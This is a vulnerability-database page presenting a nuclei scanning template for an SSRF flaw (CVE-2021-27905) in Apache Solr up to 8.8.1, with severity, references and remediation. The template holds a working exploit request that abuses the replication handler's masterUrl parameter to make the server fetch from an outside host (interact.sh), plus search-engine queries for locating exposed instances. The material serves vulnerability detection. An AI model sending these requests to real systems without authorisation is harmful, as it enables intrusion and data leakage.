Lucene search
K

Apache Solr <=8.8.1 - Server-Side Request Forgery

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 137 Views

Apache Solr <=8.8.1 - Server-Side Request Forgery vulnerability. Exploitation could lead to unauthorized access, data leakage, and potential remote code execution. Resolved in Apache Solr 8.8.2 and later

Related
Refs
Code
id: CVE-2021-27905

info:
  name: Apache Solr <=8.8.1 - Server-Side Request Forgery
  author: hackergautam
  severity: critical
  description: Apache Solr versions 8.8.1 and prior contain a server-side request forgery vulnerability. The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
  remediation: This issue is resolved in Apache Solr 8.8.2 and later.
  reference:
    - https://www.anquanke.com/post/id/238201
    - https://ubuntu.com/security/CVE-2021-27905
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-27905
    cwe-id: CWE-918
    epss-score: 0.93053
    epss-percentile: 0.99818
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query:
      - cpe:"cpe:2.3:a:apache:solr"
      - http.title:"apache solr"
      - http.title:"solr admin"
    fofa-query:
      - title="solr admin"
      - title="apache solr"
    google-query:
      - intitle:"apache solr"
      - intitle:"solr admin"
  tags: cve2021,cve,apache,solr,ssrf,vuln

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    matchers:
      - type: word
        part: body
        words:
          - '<str name="status">OK</str>'

    extractors:
      - type: regex
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
        internal: true
# digest: 4a0a0047304502200e5cc72905277bcc35f95768be671da1abf7fbbf586eb7157b5b01e5147350b3022100c075469b3d348893ff0f72c7c4431c281e741ae025139a229899b84d0bc831b8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.93053
137